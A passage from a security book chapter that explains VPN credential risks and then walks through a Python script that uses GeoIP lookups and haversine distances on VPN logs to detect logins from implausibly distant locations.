in lieu of a dedicated connection, commonly referred to
as a dedicated line, from which the technology derives its
“virtual” name. By using this technology, traffic appears to
be running through a “private” network.


How does VPN work? 

Data in VPN are transmitted via tunneling. Packets are 
encapsulated or wrapped in another packet with a new 
header that provides routing information. The route that 
these packets travel through is what is considered as the 
tunnel. There are also different tunneling protocols, but 
since this is not within the scope of this book, we will not 
be covering these protocols. Another thing to note about 
VPNs is that the data are encrypted. Basically, data go- 
ing through the tunnel, which is passed through a pub- 
lic network, are unreadable without proper decryption 
keys. This ensures that data confidentiality and integrity
are maintained.


What are the Dangers of VPN? 

Using VPN in general is considered good practice for re- 
mote access. This makes packets going through a public 
network such as the Internet unreadable without proper 
decryption keys. It also ensures data are not disclosed or 
changed during transmission. However, by default, VPN 
generally does not provide or enforce strong user authen- 
tication. Current VPN technologies support add-on two- 
factor authentication mechanisms, such as tokens and 
various other mechanisms, which were mentioned earlier. 
However, by default, it is simply a username and pass- 
word for gaining access to the internal network. This can 
present a significant risk because there could be scenar- 
ios whereby an attacker gains access to these creden- 
tials and subsequently to your internal resources. Here 
are a few examples: 


• A user can misplace their username and password.

• A user can purposely share their username and
password.

• A user can fall victim to a spear phishing attack.

• A user might be using a compromised machine with
malware harvesting credentials.


In any of the above scenarios, once an attacker ob- 
tains the user’s credentials, assuming there is no two- 
factor authentication, the attacker would be able to 
gain access to all internal resources to which the user 
currently has access via the user’s remote profiles and 
access rights. Thus, determining the access rights is 
a major factor in determining the potential extent of the 
compromise.


Monitoring VPN

As this chapter is about detecting potential unauthorized 
remote access, it is important to provide you with a brief 
background on logging VPN access. Most VPN solu- 
tions have, in one form or another, logging capabilities. 
Although much of the logging capability is dependent on 
the vendor, at the very least, your VPN logs should con- 
tain the following information: 


• User ID of the individual,

• Date and time of access,

• What resources were accessed, and

• The external IP from which the access was made.


There are many VPN solutions, so it would be impossible 
to outline all the necessary instructions to obtain your or- 
ganization’s VPN log data, but your network administrator 
should be able to provide log data to you. For the purpos- 
es of this chapter, we will be providing you with a sample 
data set that contains the aforementioned data. 

In general, log data are fairly easy to obtain. However, 
monitoring the logs to ensure that the people who are log- 
ging on are actually employees of your organization is an- 
other matter. Let us say your organization has 5000 em- 
ployees and one-quarter of them are given VPN access. 
There are still over 1000 connections that you will have to 
review. Obviously, you will not be able to ask each and ev- 
ery employee if they made the connection, right? We cer- 
tainly do not lack the data; however, we are limited by our 
analysis capabilities. This lack of analysis is what we will 
be focusing on in this chapter. 


Python and Scripting 

In most cases, we are stuck with whatever data that we 
have. If your VPN software provides robust detection 
and analytics capability helping you to identify potentially 
anomalous access cases, then your organization is off to 
a great start. Oftentimes, you just have a spreadsheet of 
VPN access, similar to what we will be providing to you in 
this chapter. Therefore, we will show you how to build this 
capability, with a little bit of programming, so that you may 
conduct your own analysis. 

Typically, programming is not what 99% of security pro- 
fessionals do for a living. Unless you work directly in rec- 
reating vulnerabilities or exploits in software, it is a skill 
that most of us know about but rarely use. We believe 
that learning to program is a valuable and useful skill for 
security professionals. You do not need to know how to 
program complex software, but programming can help 
you to automate efforts that would otherwise take a lot 
of time. For example, let us say we wanted to review all
of our VPN logs. This could be a significant task, so
providing some degree of automation, particularly if the
logic is repetitive, would really help you. In this regard,
knowing how to program or use a “scripting language” would
greatly benefit you in making the process more efficient.


What is a Scripting Language? 

There is still some ambiguity on what can be considered 
a scripting language. In principle, any programming lan- 
guage can be used as a scripting language. A script- 
ing language is designed as an extension language for 
specific environments. Typically, a scripting language is 
a programming language used for task automation, as op- 
posed to tasks executed one-by-one by a human operator. 
For example, these could be tasks a system administra- 
tor can be doing in an operating system. For our purpose, 
you can think of a scripting language as a general-pur- 
pose language. 

Scripting languages are often used to connect system 
components, and are sometimes called “glue languag- 
es.” One good example is Perl, which has been used a lot 
for this purpose. Scripting languages are also used as a 
“wrapper” program for various executables. Additionally, 
scripting languages are intended to be simple to pick up 
and easy to write. A good example of a scripting language 
that is fairly easy to pick up is Python. So, this is the lan- 
guage that we are going to use in our scenario. 


Python 
Python is relatively easy to learn while being a powerful
programming language. Its syntax allows programmers to
write programs in fewer lines than would be possible in
many other languages. It also features a large,
comprehensive standard library and many third-party tools.
It has interpreters for multiple operating systems, so if
you are using a Windows-, Mac-, or Linux-based machine, you
should be able to access and use Python. Finally, Python is
free, and since it is open source, it may be freely
distributed.
Python is an interpreted language, meaning you do 
not have to compile it, unlike more traditional languages 
like C or C++. Python is geared for rapid development, 
saving you considerable time in program development. 
As such, it is perfect for simple automation tasks, such as 
those we have planned for in our scenario for this chapter. 
Aside from this, the interpreter can be used interactively, 
providing an interface for easy experimentation. 


Resources 

As this book is not a Python tutorial, we will point you
to good resources that will help you start using Python.
The following are recommended resources:


Codecademy

A great resource that we highly recommend to start with
is the Python track of Codecademy:
http://www.codecademy.com/en/tracks/python.

Codecademy is an online interactive Web site for learn- 
ing programming languages. One of the key resources 
is Codecademy’s online tool, which provides a sandbox 
in your browser, where you can actually test your code. 
The site also has a forum for coding enthusiasts and be- 
ginners, which is helpful when you encounter problems. 


Python.org 

Python.org is the official Web site for Python. Python is
a very well-documented language, as is apparent from the
amount of documentation available on the site. The full
documentation for Python 3.4 (the stable version at the
time of this writing) is available at the following link:
https://docs.python.org/3.4/.

As you will see, the documentation is comprehensive.
When you become more experienced with Python, this
will be a great source of information. However, before you
go too deep, you should go to this link for a basic tutorial
to first get your feet wet:
https://docs.python.org/3.4/tutorial/index.html.


Learning Python the Hard Way 

Contrary to the title, this is actually a really good
resource for learning Python. It is a beginner’s programming
course that includes videos and a downloadable book. The
main Web site is http://learnpythonthehardway.org.

If you do not want to pay for the videos and the
downloadable book, the content is also available online
here: http://learnpythonthehardway.org/book/.

The course consists of about 52 exercises. Depending
on your skill level and the amount of time you want to
invest in learning the language, the author claims it can
take as little as one week or as long as six months.
Either way, it is a very good resource that you should
consider reviewing.


Things to Learn 
At the very least, you should consider learning the follow- 
ing Python topics: Python syntax, strings, conditionals, 
control flow, functions, lists, and loops. 

If this is your first time with a scripting language, do not
worry. You do not have to be an expert in Python to be
able to continue with this chapter. As we go through the
scenario, we will be explaining what each piece of the
sample code is doing. But before that, let us go into more
detail on our scenario and the techniques we will actually
use to solve the problem.


SCENARIO, ANALYSIS, AND TECHNIQUES
Let us discuss the overall scenario we will be using. We will 
break this down based on the questions we need to answer: 


• What is the problem?

• What are the data that we will be using and how do
we collect them?

• How will we analyze the data? What techniques are
we using?

• How will we be able to practically apply the analysis
technique to the data?

• How will we deliver the results?


Problem 
In our scenario, we want to show how to identify poten- 
tially unauthorized remote accesses to an organization. 


Data Collection
The data we will be using for our scenario are the VPN
access logs. At a minimum, the data will contain the
following information:


• User ID

• Date and time of access

• Internal resource accessed (internal IP)

• Source IP (external IP)


We will assume that these data were provided to us as
a spreadsheet, as this is the most common way of exporting
data. For now, you can use the data set provided as part
of this book. A sample extract from that data set is shown
in Figure 1.


Data Analysis 
Before we go into identifying potentially anomalous VPN
logins, let us think about a simpler scenario. If you were
going through your credit card transaction statements and
saw the events listed below, what would you conclude?


• Your credit card was used at the same time at two
different locations;

• Your credit card was used in Russia (and you have
never been there);

• Your credit card was used in two different physical
locations in the same hour when it is physically
impossible to get there in an hour; and

• Your credit card was used a hundred different times
in the course of the week.


These are indicators that your credit card may have 
been compromised. While this is a simplistic example, 
we will be extending this type of analysis in our scenar- 
io by looking for anomalous behavior indicating a com- 
promise. 

So now, let us review our VPN access logs. Let us as- 
sume that you only had to review your access. How would 
you review the VPN access logs manually? What would 
you look for? It would be fairly straightforward, right? Let 
us use the same fact pattern we used for the credit card 
transactions. 


• Your user ID logged in concurrently from two different
IP addresses;

• Your user ID logged in from Russia (and you have
never been there);

• Your user ID was used twice in an hour from your
office and your home when it is physically impossible to
get there in an hour; and

• Your user ID logged in from a hundred different IP
addresses in the course of the week.


Figure 1. Sample data set: VPN logs


It makes sense, right? This is just plain logic and
common sense, assuming we are only looking for the narrow
fact patterns listed above. If you think about it, there
could be other scenarios in which you could look for
similar anomalous behavior. For example, listed below are
sample questions that could lead us to finding anomalous
user connections:


• How much time does a user’s session usually take?

• What time does a given user usually log in?

• At what time does a given user’s connection usually
originate?

• At what time does a given source IP address usually
originate?

• At what time do all connections usually originate from?

• At what time do connections from a certain city
(based on the IP address) usually originate?

• What is the relationship between log-in time and
access time of an internal system?

• What time does a given user usually log off?

• What time does a source IP address usually log off?

• What time does a user’s country usually log off?

• What time does a user’s city usually log off?

• What time does an internally accessed system have
in common with the log-off time from the VPN?

• From what source IP address does a given user
originate?

• From what country does a given user originate?

• From what city does a given user originate?

• What internal system does a given username usually
access?

• What is the IP address with which a country is usually
associated?

• What is the IP address with which a city is usually
associated?

• What users connected to an internal system?

• With what country is a given city associated?

• Which internal systems are accessed from which
country?

• Which internal systems are accessed from certain
cities?
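
To make one of these questions concrete, here is a minimal sketch of how “From what source IP address does a given user originate?” could be answered once the logs are in memory. The user names and addresses below are made up for illustration, and the code assumes Python 3.

```python
from collections import defaultdict

# Hypothetical (user, source_ip) pairs standing in for parsed VPN log rows.
logins = [
    ("user1", "108.178.181.38"),
    ("user1", "108.178.181.38"),
    ("user1", "203.0.113.7"),
    ("user2", "198.51.100.23"),
]

# Collect the set of distinct source addresses seen for each user.
ips_by_user = defaultdict(set)
for user, source_ip in logins:
    ips_by_user[user].add(source_ip)

# Number of distinct source addresses per user; an unusually large
# count for one user could be worth a closer look.
distinct_counts = {user: len(ips) for user, ips in ips_by_user.items()}
```

The same grouping idea extends to most of the other questions by changing what is used as the key and what is collected.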


As you can see, we have raised multiple questions
that could indicate a potentially suspicious connection.
But for now, let us focus on one potentially critical
factor: distance of connection. Obviously, even if a user
was working remotely, it would be suspicious if that user
logged in from multiple locations when it is physically
impossible to be in all of them. Of course, there could be
exceptions. For example, a user could log in from one
machine at a particular location, log off that machine,
and then log in from a different machine at a different
location; however, this is suspicious in itself.

So, first we need to ask ourselves what would be a good
way to determine if the distance between locations is
significant. For this, we can use haversine distances.


Haversine Distances 

The haversine formula gives the great-circle distance
between a pair of latitude-longitude coordinates. Basically,
it is a calculation of geographic distance over the surface
of a sphere, which is an approximation because the Earth is
not a perfect sphere. This equation is important in
navigation, but it can be used in other applications. For
example, it can be used to determine accessibility of
health-care facilities within a certain geographical area.
The haversine distance technique can also be used in crime
analysis applications, such as finding incidents taking
place within a particular distance.

We will not go through the math involved in calculating 
a haversine distance, but we will cover how we can apply 
this to our problem. Simply put, the greater the haversine 
distance, the greater the distance between the sources of 
the remote logins. And, the greater the distance between 
the remote logins of one particular user in a given time 
span, the greater are the chances that this was a poten- 
tially anomalous user access. 
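
For readers who would like to see the calculation anyway, the following is a minimal sketch of the standard haversine formula in Python. The function name and the mean Earth radius of 6371 km are our own choices for illustration, not necessarily what the chapter's program uses.

```python
import math

EARTH_RADIUS_KM = 6371.0  # mean Earth radius; an assumed constant for this sketch


def haversine_km(lat1, lon1, lat2, lon2):
    """Return the great-circle distance in kilometers between two points
    given as latitude and longitude in decimal degrees."""
    # The math functions expect radians, so convert from degrees first.
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlambda = math.radians(lon2 - lon1)
    # Haversine formula: a is the squared half-chord length between the points.
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlambda / 2) ** 2)
    # Clamp to 1.0 to guard against floating-point overshoot near antipodes.
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(min(1.0, a)))
```

Calling haversine_km() with the coordinates of two login locations gives the distance a user would have had to travel between them.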


Data Processing 

So now, we have the data (the VPN logs) and we have our 
analysis technique (haversine distances). But how do we 
put these together? This is when our scripting or “glue” 
language comes into play. In order to process the data, 
we will have to create a script that will do the following 
things: 


• Import the data: First, we will need to import the VPN
logs so that our program can process them. For example,
if the data are in the form of a spreadsheet, then we
will need to load the data from the spreadsheet into
memory so that we can preprocess the data and then apply
our analysis technique.

• Preprocess the data: “Preprocessing” means making the
data better structured, so that they can be used by our
analysis technique. For example, our VPN logs only have
source IPs. In order to actually get the haversine
distance, we will need the latitude and longitude values.
Aside from that, we will need to do some error checking
and validation to make sure the data we are entering for
analysis are valid. As they say, “garbage in, garbage
out.”

• Apply the analysis technique: Once we have all the
necessary data, we will then use our analysis technique,
which in this case is the haversine distance.

• Generate the results: Finally, once we get the
haversine distance, we will need to determine a threshold
for what is unusual for a certain amount of time.
Obviously, a greater haversine distance covered in
a shorter span between logins is more suspicious.
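
One possible way to express such a threshold, offered here only as a sketch, is the travel speed implied by two consecutive logins. The function names and the 900 km/h cutoff (roughly airliner speed) are hypothetical; the distance is assumed to have been computed already with the haversine formula.

```python
from datetime import datetime

MAX_SPEED_KMH = 900.0  # hypothetical threshold, roughly airliner cruising speed


def implied_speed_kmh(distance_km, earlier, later):
    """Speed a user would need to cover distance_km between two logins."""
    hours = (later - earlier).total_seconds() / 3600.0
    if hours <= 0:
        # Simultaneous (or out-of-order) logins from different places:
        # treat any nonzero distance as infinitely fast travel.
        return float("inf") if distance_km > 0 else 0.0
    return distance_km / hours


def is_suspicious(distance_km, earlier, later, max_speed_kmh=MAX_SPEED_KMH):
    """Flag a pair of logins whose implied travel speed exceeds the threshold."""
    return implied_speed_kmh(distance_km, earlier, later) > max_speed_kmh
```

For example, two logins one hour apart from locations 6000 km apart would be flagged, while two logins one hour apart from locations 50 km apart would not.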


We have covered the basic steps we will be following 
in developing our Python program. In the next section, 
we start diving into the innards of our Python program. If 
you have some programming knowledge and can follow 
a program's flow (i.e., loops and conditions), you should 
be able to follow the case study even without any Python 
knowledge. If you do not have the programming knowl- 
edge, feel free to go through the primer resources pro- 
vided in the previous section. 


CASE STUDY 
Importing What You Need 


import argparse
import re
import csv
import math
from datetime import datetime


Now let us go over the code. First off, you will see sev- 
eral import statements. In most programming languag- 
es, a programmer is not expected to do everything 
from scratch. For example, if someone has already built 
scripts to handle processing of date and time, typical- 
ly one does not have to write them from scratch. Often- 
times, there are “modules” a programmer can “import,” 
so they can reuse the scripts and incorporate them into 
other programs or scripts. This is basically what is hap- 
pening with the programming code outlined above. 

Python code gains access to the functionality provided
by a module through the process of importing it. The import
statement, as seen here, is the most common way of invoking
the import machinery.

Let us go through each of the modules that we are im- 
porting: 


• The argparse module is used to create command-line
interfaces for your script, so that it can be run like this:


python yourprogramname.py arguments


You define which arguments the program requires, and the
module works out how to parse them, generates help and
usage messages, and issues errors when a user gives the
program invalid arguments. We will use this module to
accept arguments from our command line, such as the name
of the VPN log file that we are going to process.


• The re module provides regular expression support
to Python programs. A regular expression specifies
a set of strings that match it. Basically, the functions
in this module let you check whether a particular string
matches a given regular expression. If you have limited
exposure to regular expressions, there is a good amount of
reference material available on the Web. Since our VPN
logs are mostly unstructured text, we will be using this
module to parse the events in our VPN logs to produce
a more structured data set.

• The csv module provides support for reading, writing,
and manipulating CSV, or “comma-separated values,” files.
The CSV format is probably the most common import and
export format for spreadsheets and databases. It should be
noted, though, that there is no single standard CSV format,
so it can vary from application to application. There are
CSV files where the delimiters are not even commas: they
can be spaces, tabs, semicolons (;), carets (^), or pipes
(|). The overall format is similar enough for this module
to read and write tabular data. We will be using this
module in our scenario to process VPN logs formatted as
CSV, and we will produce the results in the same format
as well.

• The math module provides access to the mathematical
functions defined by the C standard. We need the math
module for the computations we will be doing in the
script, particularly when we use the haversine distance
formula.

• The datetime module supplies classes for manipulating
dates and times, in both simple and complex ways. While
date and time arithmetic is supported, the focus of the
implementation is on efficient attribute extraction for
output formatting and manipulation. For related
functionality, see the time and calendar modules.
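
As a small illustration of the point about delimiters, the sketch below reads semicolon-delimited text with the csv module. The column names and values are made up, and the code assumes Python 3, where csv works on text streams such as io.StringIO.

```python
import csv
import io

# Hypothetical semicolon-delimited export; the column names are made up.
sample = io.StringIO("user;source_ip\nuser1;108.178.181.38\n")

# The delimiter argument tells the reader which character separates fields.
reader = csv.reader(sample, delimiter=";")
rows = list(reader)
```

Each element of rows is a list of strings, one list per line of input, regardless of which delimiter the file uses.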


# requires maxmind geoip database and library 
# http://dev.maxmind.com/geoip/legacy/install/city/ 


import GeoIP 


We will also be using a third-party module called GeoIP
for our program. This is MaxMind’s GeoIP module,
which will enable our program to identify geographic
information from an IP address. Most importantly, we are
concerned with the latitude and longitude for our haversine
distance computation, but it also allows us to identify
the location, organization, and connection speed.
MaxMind’s GeoIP is one of the more popular geolocation
databases. More information is available at this link:
http://dev.maxmind.com/geoip/geoip2/geolite2/.

For our scenario, we will be using the GeoLite2 database,
which is a free geolocation database, also from MaxMind.
It is comparable to, but less accurate than, the company’s
premier product, the GeoIP2 database.

To get started with MaxMind GeoIP, follow this link
and install it on your system:
http://dev.maxmind.com/geoip/legacy/install/city/.

The link above provides a brief outline of the steps
needed to install GeoIP City on Linux or Unix systems.
The installation on Windows is similar: you will just need
to use WinZip or a similar ZIP program. The outline
provides the following steps:


• Download database
• Install database
• Query database
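
As a rough sketch of the query step, the helper below pulls the latitude and longitude out of a lookup result. It assumes a database object that behaves like the one returned by the legacy GeoIP module's open() call, whose record_by_addr() method returns a dictionary or None. So that the sketch runs without a database installed, it uses a stand-in class; the class, the helper name, the file path in the comment, and the coordinates are all made up for illustration.

```python
def lookup_coordinates(geo_db, ip_address):
    """Return (latitude, longitude) for ip_address, or None if unknown.

    geo_db is assumed to offer record_by_addr(), returning a dict
    with 'latitude' and 'longitude' keys, or None when there is no match.
    """
    record = geo_db.record_by_addr(ip_address)
    if record is None:
        return None
    return record["latitude"], record["longitude"]


class FakeGeoDB(object):
    """Stand-in for a real database, used only so this sketch can run."""

    def __init__(self, records):
        self._records = records

    def record_by_addr(self, ip_address):
        return self._records.get(ip_address)


# With the real library this would be something like (path is an assumption):
#   import GeoIP
#   geo_db = GeoIP.open("/usr/local/share/GeoIP/GeoLiteCity.dat",
#                       GeoIP.GEOIP_STANDARD)
geo_db = FakeGeoDB({"108.178.181.38": {"latitude": 41.85, "longitude": -87.65}})
coords = lookup_coordinates(geo_db, "108.178.181.38")
```

Returning None for unknown addresses matters in practice, because private or unlisted addresses will not have a record and should be skipped rather than crash the analysis.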


Program Flow

def main():
    """ Main program function """
    args = parse_args()
    # read report
    header, rows = read_csv(args.report)
    # normalize event data
    events = normalize(header, rows)
    # perform analytics
    events = analyze(events)
    # write output
    write_csv(args.out, events)


if __name__ == '__main__':
    main()


The main function provides the flow of the actual program.
Figure 2 illustrates how the program will work.

Figure 2. The remote access Python analytics program flow
(Read Arguments, Read Logs, Normalize Data, Analyze Data,
Generate Report)

The flow is fairly straightforward, since it is a very simple 
program. Here is an additional description of the overall 
program flow. 


• The program will read and parse the command-line
argument. This is how the program knows which VPN
log it will need to process.

• Once the name of the file has been passed through
the argument, the program will then read the file.

• While reading the file, the program will start
normalizing the contents of the VPN logs. This means that
the data are converted to a format that is more
conducive to processing.

• Once the data are normalized, the program will then
run the analysis, which in this case consists of GeoIP
processing, which includes identifying the latitude
and longitude, as well as the computation of the
haversine distance.

• Finally, we will generate the report that will show the
accounts that have the highest haversine distance.


In the subsequent sections, we will go through a more 
detailed review of each process and code snippets one- 
by-one. 


Parse the Arguments 
Let us go through the code that reads and parses the
command-line arguments. The main function does this with
the following call:


args = parse_args()


The function we are calling is parse_args():


def parse_args():
    # parse command-line options
    parser = argparse.ArgumentParser()
    # 'rb' suits the Python 2 csv module; Python 3 needs text mode ('r')
    parser.add_argument('report',
                        type=argparse.FileType('rb'),
                        help='csv report to parse')
    parser.add_argument('-o', '--out', default='out.csv',
                        type=argparse.FileType('w'),
                        help='csv report output file')
    return parser.parse_args()


Basically, this code snippet allows the program to take
command-line arguments. In our case, there are two
arguments that we would like to be able to pass:


• The name of the VPN log file that we would like to
process.

• The name of the output file where the results will be
written.


The important part of the code is the parser.add_argument()
method. You will notice that we have two calls,
corresponding to the two arguments we need to take.

Overall, this allows us to issue a command in the
following manner:


python analyze.py vpn.csv -o out.csv


You will also see that “-o” is not required, because
it defaults to “out.csv,” as you can see in the second
add_argument() call in the program.
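
The default can be checked without touching any files. The sketch below is a simplified variant of the parser that keeps the arguments as plain strings instead of opening them as files, which is our simplification for illustration; passing an explicit list to parse_args() stands in for the real command line.

```python
import argparse

parser = argparse.ArgumentParser()
# Plain strings here; the chapter's version opens these as files instead.
parser.add_argument("report", help="csv report to parse")
parser.add_argument("-o", "--out", default="out.csv",
                    help="csv report output file")

# Passing an explicit list stands in for the real command line.
defaults = parser.parse_args(["vpn.csv"])
explicit = parser.parse_args(["vpn.csv", "-o", "results.csv"])
```

Here defaults.out falls back to “out.csv” because no -o option was given, while explicit.out holds the name supplied on the command line.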


Read the VPN Logs 

Let us go through the code that reads the file containing
the VPN logs. This is done through the following
statements in main:


# read report
header, rows = read_csv(args.report)


The function that is called is read_csv():


def read_csv(file):
    """ Reads a CSV file and returns the header and rows """
    with file:
        reader = csv.reader(file)
        header = next(reader)  # first row is the header
        rows = list(reader)    # remaining rows are the log entries
    return header, rows


This snippet of code allows the program to read the CSV 
file. Here are the various processes the code implements: 


• A CSV object called “reader” is created. This uses the
csv module that was imported previously. The csv module
provides methods to manipulate tabular data.

• The reader object iterates over the lines in the given
CSV file. Each row read from the CSV file is returned
as a list of strings.

• Since the first row of our data file contains a header
(the titles of the columns), the program reads the first
line and gets the header information. This is stored in
the “header” variable.

• The contents of the file, the log entries themselves,
are then loaded into the “rows” variable.


At the end of all this, we loaded the entire content of the 
VPN log file into memory and returned it to the program 
for further processing. 
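
To try the reading step without a real log file, the sketch below feeds an in-memory file to a read_csv() function written for Python 3. The two-column sample is made up; only the column names ReceiveTime and RawMessage come from the program discussed in this chapter.

```python
import csv
import io


def read_csv(file):
    """Read a CSV file object and return (header, rows)."""
    with file:
        reader = csv.reader(file)
        header = next(reader)   # first row holds the column titles
        rows = list(reader)     # remaining rows are the log entries
    return header, rows


# Hypothetical two-line log; real exports will have more columns.
sample = io.StringIO(
    "ReceiveTime,RawMessage\n"
    '"Apr 3, 2013 2:05:20 PM HST",example message\n'
)
header, rows = read_csv(sample)
```

Note that the timestamp contains a comma but is still read as a single field, because it is enclosed in quotes in the input.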


Normalize the Event Data from the VPN logs 

After we have loaded all the data into memory, the next 
step is to normalize the event data. This is done by calling 
the following code from main: 


# normalize event data
events = normalize(header, rows)


The function to normalize data is called normalize():


def normalize(header, rows):
    """ Normalizes the data """
    events = []
    for row in rows:
        timestamp = row[header.index('ReceiveTime')]
        raw_event = row[header.index('RawMessage')]
        event = Event(raw_event)
        event.timestamp = datetime.strptime(timestamp, TIME_FMT)
        events.append(event)
    return sorted(events, key=lambda x: (x.user, x.timestamp))


The code snippet above normalizes the data from the
VPN logs. We normalize the data because VPN logs, like
most logs, are typically unstructured text similar to the
line below.


<164>%ASA-4-722051: Group <VPN_GROUP_POLICY> User <user1> IP <108.178.181.38> Address <10.10.10.10> assigned to session


Typically, if you want to analyze data, you first need
to process them into a usable format. We use the
normalize() function to do just that. In our case, we
would like to structure our data so that we are able to
separate them into the following elements:


• the user ID,
• the external IP address,
• the internal IP address, and
• the date and time.


Let us go through the code and see what it does: 


• The program loads the “ReceiveTime” and “RawMessage”
columns. We obtained these columns through the reader
object via the csv module.

• Then, the program converts the timestamp to a more
usable format. There are certain formats that do not work
well in manipulating data. In this case, the format in our
VPN logs, such as “Apr 3, 2013 2:05:20 PM HST,” is a string
that is not conducive to data manipulation (e.g., sorting
operations). We use the datetime.strptime() class method
to convert the string to an actual date/time object,
allowing us to perform date/time manipulation on the data.

• The program passes the raw message to an Event
object. First, let us look at the Event class, which
looks like the code below:


    class Event(object):
        """ Basic event class for handling log events """
        _rules = []
        _rules.append(Rule("ASA-4-722051", "connect", CONNECT))
        _rules.append(Rule("ASA-5-722037", "disconnect", DISCONNECT))

        def __init__(self, raw_event):
            for rule in self._rules:
                if rule.key in raw_event:
                    self._match_rule(rule, raw_event)
                    self.key = rule.title

        def _match_rule(self, rule, raw_event):
            match = rule.regex.match(raw_event)
            # items() works on both Python 2 and Python 3
            for key, value in match.groupdict().items():
                setattr(self, key, value)

        def __str__(self):
            return str(self.__dict__)

        def __repr__(self):
            return repr(self.__dict__)


The Event class then utilizes the Rule class, which looks 
like the following: 


    class Rule(object):
        """ Basic rule object class """
        def __init__(self, key, title, regex):
            self.key = key
            self.title = title
            self.regex = re.compile(regex)


• What do the Event and Rule classes do? Basically,
  these classes are used to parse the VPN logs into
  “structured” events. This is done via the Rule class,
  which uses regular expressions to break down the
  string. For example, “connect” events in the VPN
  logs are parsed using this expression:

    CONNECT = (r'.*> User <(?P<user>.*)> IP <(?P<external>.*)> '
               r'Address <(?P<internal>.*)> assigned to session')

• Using the regular expression in the CONNECT variable
  above, the program can extract the user, the external
  IP, and the internal IP from the raw message of the
  VPN log.

• Finally, once we have parsed and normalized all the
  needed information, we sort the events by user and
  timestamp. By doing this, we will be able to compare
  the following:
  • when and where the user is currently logged in, and
  • when and where the user previously logged in before
    the current login.


The reason for this will be more readily apparent as we 
go through the analysis of the data. 
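
To make the timestamp conversion and the final sort concrete, here is a minimal sketch. The TIME_FMT value below is an assumption, since the script's own constant is not shown in the text, and parse_receive_time() is a hypothetical helper. The trailing time zone name is dropped before parsing because strptime's %Z directive only recognises a handful of names on most platforms.

```python
from datetime import datetime

# Assumed format string; the script's own TIME_FMT is not shown.
TIME_FMT = '%b %d, %Y %I:%M:%S %p'


def parse_receive_time(text):
    """Parse a value such as 'Apr 3, 2013 2:05:20 PM HST' into a datetime.

    The last word (the time zone name) is discarded, so the result is a
    naive datetime in the log's local time.
    """
    without_zone = text.rsplit(' ', 1)[0]
    return datetime.strptime(without_zone, TIME_FMT)


rows = [
    ('user2', 'Apr 1, 2013 4:43:00 PM HST'),
    ('user1', 'Apr 3, 2013 9:15:00 AM HST'),
    ('user1', 'Apr 3, 2013 9:12:00 AM HST'),
]

# Sort by user first, then by time, as normalize() does.
events = sorted(
    ((user, parse_receive_time(stamp)) for user, stamp in rows),
    key=lambda e: (e[0], e[1]),
)
for user, when in events:
    print(user, when.isoformat())
```

Sorting on the (user, timestamp) pair puts each user's logins next to each other in time order, which is what lets the later analysis compare an event with the one directly before it.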


Run the Analytics 


    def analyze(events):
        """ Main event analysis loop """
        gi = GeoIP.open(GEOIP_DB, GeoIP.GEOIP_STANDARD)
        for i, event in enumerate(events):
            # calculate the geoip information
            if event.external:
                record = gi.record_by_addr(event.external)
                events[i].geoip_cc = record['country_code']
                events[i].geoip_lat = record['latitude']
                events[i].geoip_long = record['longitude']

            # calculate the haversine distance
            if i > 0:
                if events[i].user == events[i-1].user:
                    origin = (events[i-1].geoip_lat,
                              events[i-1].geoip_long)
                    destination = (events[i].geoip_lat,
                                   events[i].geoip_long)
                    events[i].haversine = distance(origin,
                                                   destination)
                else:
                    events[i].haversine = 0.0
            else:
                events[i].haversine = 0.0
        return events


This is the “meat” of the script we are creating. This is
where we compute the haversine distance we will be using
to detect unusual VPN connections. First, we need to
get the location. We do this by looking up the location of
the connection using the MaxMind GeoIP API:


    gi = GeoIP.open(GEOIP_DB, GeoIP.GEOIP_STANDARD)
    for i, event in enumerate(events):
        # calculate the geoip information
        if event.external:
            record = gi.record_by_addr(event.external)
            events[i].geoip_cc = record['country_code']
            events[i].geoip_lat = record['latitude']
            events[i].geoip_long = record['longitude']


Here you see that we create a GeoIP object. Then, we
go through all the events and pass the external IP address
(using event.external) to get the following GeoIP
information:


• country code,
• latitude, and
• longitude.
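
The enrichment step can be tried without a GeoIP database by swapping in a small lookup table. The sketch below does that: FAKE_GEOIP, the simplified Event class and add_geoip() are all hypothetical stand-ins, and the coordinates are copied from the sample output later in this article. It also stores None when a lookup comes back empty, on the assumption that some addresses (private or unlisted ones, for example) may have no record.

```python
# Stand-in for the GeoIP database, for illustration only. The values
# are copied from the sample output shown later in the article.
FAKE_GEOIP = {
    '66.175.72.33': {'country_code': 'US',
                     'latitude': 21.3209, 'longitude': -157.8389},
    '108.178.181.38': {'country_code': 'US',
                       'latitude': 21.3136005, 'longitude': -157.80569},
}


class Event(object):
    """Minimal event holder (hypothetical, simpler than the script's)."""
    def __init__(self, user, external):
        self.user = user
        self.external = external


def add_geoip(events, lookup):
    """Attach geoip_cc, geoip_lat and geoip_long to every event.

    `lookup` is any callable that maps an IP string to a record dict,
    or to None when the address is unknown.
    """
    for event in events:
        record = lookup(event.external) if event.external else None
        if record is None:
            event.geoip_cc = event.geoip_lat = event.geoip_long = None
        else:
            event.geoip_cc = record['country_code']
            event.geoip_lat = record['latitude']
            event.geoip_long = record['longitude']
    return events


events = add_geoip(
    [Event('user90', '66.175.72.33'), Event('user90', '192.0.2.1')],
    FAKE_GEOIP.get,
)
for event in events:
    print(event.external, event.geoip_cc, event.geoip_lat, event.geoip_long)
```

Passing the lookup in as a callable keeps the loop identical whether the records come from a dictionary, as here, or from a real database handle.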


The latitude and longitude are the essential elements we 
need to compute the haversine distance here: 


    # calculate the haversine distance
    if i > 0:
        if events[i].user == events[i-1].user:
            origin = (events[i-1].geoip_lat, events[i-1].geoip_long)
            destination = (events[i].geoip_lat, events[i].geoip_long)
            events[i].haversine = distance(origin, destination)
        else:
            events[i].haversine = 0.0
    else:
        events[i].haversine = 0.0


We compare before and after connections for one user in this 
section. Here is the pseudocode on how the code operates: 


• Is the previous event from the same user?
• If yes, then:
  • Where did the user’s current connection come from?
  • Where did the connection before this current one
    come from?
  • Compute the haversine distance.
• If no, then:
  • Zero out the haversine computation.


Pretty simple, is it not? So now, how is the haversine
distance computed? The distance method in the code is used:


    def distance(origin, destination):
        """ Haversine distance calculation
        https://gist.github.com/rochacbruno/2883505
        """
        lat1, lon1 = origin
        lat2, lon2 = destination
        radius = 6371 # km

        dlat = math.radians(lat2-lat1)
        dlon = math.radians(lon2-lon1)
        a = math.sin(dlat/2) * math.sin(dlat/2) + \
